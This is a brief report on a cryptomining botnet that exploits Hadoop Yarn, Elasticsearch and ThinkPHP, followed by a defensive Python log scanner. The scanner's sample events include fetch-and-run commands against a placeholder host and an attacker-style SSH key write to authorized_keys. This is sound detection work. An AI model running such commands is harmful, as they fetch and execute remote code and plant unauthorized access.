Cryptomining Botnet Uses Bitcoin Wallet to Avoid Detection


Infection Chain
The initial infection starts with the exploitation of remote code execution vulnerabilities in Hadoop Yarn, Elasticsearch (CVE-2015-1427) and ThinkPHP (CVE-2019-9082). The payload delivered causes the vulnerable machine to download and execute a malicious shell script.
"In older campaigns, the shell script itself handled the key functions of infection. The stand-alone script disabled security features, killed off competing infections, established persistence, and in some cases, continued infection attempts across networks found within the known host files," the report notes.
But the newer instances of the shell script are written with fewer lines of code and use binary payloads for handling more system interactions, such as killing off competition, disabling security features, modifying SSH keys, downloading malware and starting the miners.
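
A defender can look for the behaviours named above (a service account fetching and running a shell script, and writes to SSH key files) in process-execution logs. The following is an added example, not code from the report; the log line format, the service account names and the sample events are all constructed assumptions.

```python
import re

# Accounts that typically run the software named in the article (assumed names).
SERVICE_USERS = {"yarn", "elasticsearch", "www-data"}

# Fetch-and-execute: a downloader whose output is piped into, or saved and run by, a shell.
FETCH_EXEC = re.compile(
    r"\b(curl|wget)\b[^|;&]*(\|\s*(ba)?sh\b|(;|&&)\s*(ba)?sh\s+\S+|(;|&&)\s*chmod\s+\+x\b)"
)
# Writes to an SSH authorized_keys file (redirect, tee, or copy/move into place).
SSH_KEY_WRITE = re.compile(r"(>>?|\btee\b|\bcp\b|\bmv\b)[^|;&]*authorized_keys\b")

def parse(line):
    """Parse 'ts user=<u> parent=<p> cmd=<rest of line>' into a dict, or None."""
    m = re.match(r"(\S+) user=(\S+) parent=(\S+) cmd=(.*)$", line)
    if not m:
        return None
    return dict(zip(("ts", "user", "parent", "cmd"), m.groups()))

def classify(event):
    """Return a sorted list of finding names for one process-execution event."""
    findings = set()
    cmd = event["cmd"]
    if FETCH_EXEC.search(cmd):
        findings.add("fetch_and_execute")
        if event["user"] in SERVICE_USERS:
            findings.add("service_account_spawned_downloader")
    if SSH_KEY_WRITE.search(cmd):
        findings.add("authorized_keys_modified")
    return sorted(findings)

def scan(lines):
    """Return {timestamp: findings} for every parsable line with a finding."""
    out = {}
    for ev in filter(None, map(parse, lines)):
        if (found := classify(ev)):
            out[ev["ts"]] = found
    return out

# Constructed sample events (not from the report); hosts and key are placeholders.
SAMPLE = [
    "2021-01-01T10:00:00Z user=yarn parent=java cmd=sh -c curl -fsSL http://host.invalid/a.sh | sh",
    "2021-01-01T10:00:05Z user=yarn parent=sh cmd=sh -c echo ssh-rsa PLACEHOLDER >> /root/.ssh/authorized_keys",
    "2021-01-01T10:01:00Z user=alice parent=bash cmd=curl -O https://host.invalid/release.tar.gz",
    "2021-01-01T10:02:00Z user=www-data parent=php-fpm cmd=sh -c wget -q http://host.invalid/b.sh -O /tmp/b.sh; sh /tmp/b.sh",
]

if __name__ == "__main__":
    print(scan(SAMPLE))
```

The plain download by an interactive user is not flagged; only the download-then-run shape and the key-file write are.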
